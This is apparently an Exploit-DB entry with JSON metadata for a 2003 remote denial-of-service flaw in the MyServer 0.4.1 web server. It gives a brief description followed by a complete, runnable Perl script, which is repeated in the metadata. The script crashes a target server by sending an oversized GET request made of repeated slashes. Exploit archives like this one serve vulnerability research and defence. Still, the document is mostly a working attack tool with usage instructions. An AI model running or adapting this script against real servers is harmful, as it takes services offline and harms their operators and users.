MyServer 0.4.1 - Remote Denial of Service Vulnerability
2003-06-23T00:00:00
ID EDB-ID:22817 Type exploitdb Reporter eip Modified 2003-06-23T00:00:00
Description
MyServer 0.4.1 Remote Denial Of Service Vulnerability. Dos exploit for windows platform
source: http://www.securityfocus.com/bid/8010/info
MyServer HTTP server has been reported prone to a remote denial of service attack.
The issue presents itself, likely due to a lack of sufficient bounds checking, performed on arguments that are supplied via malicious HTTP GET requests. It has been reported that a remote attacker may invoke a malicious HTTP GET request containing excessive data, that will supposedly trigger a segmentation fault in the server executable and the software will fail.
#!/usr/bin/perl
#Myserver 0.4.1 Remote Denial of service ;)
#oh joy...
#deadbeat, uk2sec
#eip@oakey.no-ip.com
#deadbeat@sdf.lonestar.org
use IO::Socket;
$dos = "//"x100;
$request = "GET $dos"."HTTP/1.0\r\n\r\n";
$target = $ARGV[0];
print "\n\nMyserver 0.4.1 Remote Denial Of Service..\n";
print "deadbeat, uk2sec..\n";
print "usage: perl $0 <target>\n";
$sox = IO::Socket::INET->new(
Proto=>"tcp",
PeerPort=>"80",
PeerAddr=>"$target"
)or die "\nCan't connect to $target..\n";
print $sox $request;
sleep 2;
close $sox;
print "Done...\n";
{"bulletinFamily": "exploit", "id": "EDB-ID:22817", "cvelist": [], "modified": "2003-06-23T00:00:00", "lastseen": "2016-02-02T19:36:44", "edition": 1, "sourceData": "source: http://www.securityfocus.com/bid/8010/info\r\n\r\nMyServer HTTP server has been reported prone to a remote denial of service attack.\r\n\r\nThe issue presents itself, likely due to a lack of sufficient bounds checking, performed on arguments that are supplied via malicious HTTP GET requests. It has been reported that a remote attacker may invoke a malicious HTTP GET request containing excessive data, that will supposedly trigger a segmentation fault in the server executable and the software will fail. \r\n\r\n#!/usr/bin/perl\r\n\r\n#Myserver 0.4.1 Remote Denial of service ;)\r\n#oh joy...\r\n#deadbeat, uk2sec\r\n#eip@oakey.no-ip.com\r\n#deadbeat@sdf.lonestar.org\r\n\r\nuse IO::Socket;\r\n$dos = \"//\"x100;\r\n$request = \"GET $dos\".\"HTTP/1.0\\r\\n\\r\\n\";\r\n\r\n$target = $ARGV[0];\r\n\r\nprint \"\\n\\nMyserver 0.4.1 Remote Denial Of Service..\\n\";\r\nprint \"deadbeat, uk2sec..\\n\";\r\nprint \"usage: perl $0 <target>\\n\";\r\n$sox = IO::Socket::INET->new(\r\n Proto=>\"tcp\",\r\n PeerPort=>\"80\",\r\n PeerAddr=>\"$target\"\r\n)or die \"\\nCan't connect to $target..\\n\";\r\nprint $sox $request;\r\nsleep 2;\r\nclose $sox;\r\nprint \"Done...\\n\";\r\n\r\n", "published": "2003-06-23T00:00:00", "href": "https://www.exploit-db.com/exploits/22817/", "osvdbidlist": ["2189"], "reporter": "eip", "hash": "9e1fe9740163927f672348b90ca79c40f5cd402652044c7a150505af590c4732", "title": "MyServer 0.4.1 - Remote Denial of Service Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "MyServer 0.4.1 Remote Denial Of Service Vulnerability. Dos exploit for windows platform", "references": [], "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/22817/", "enchantments": {"vulnersScore": 5.0}}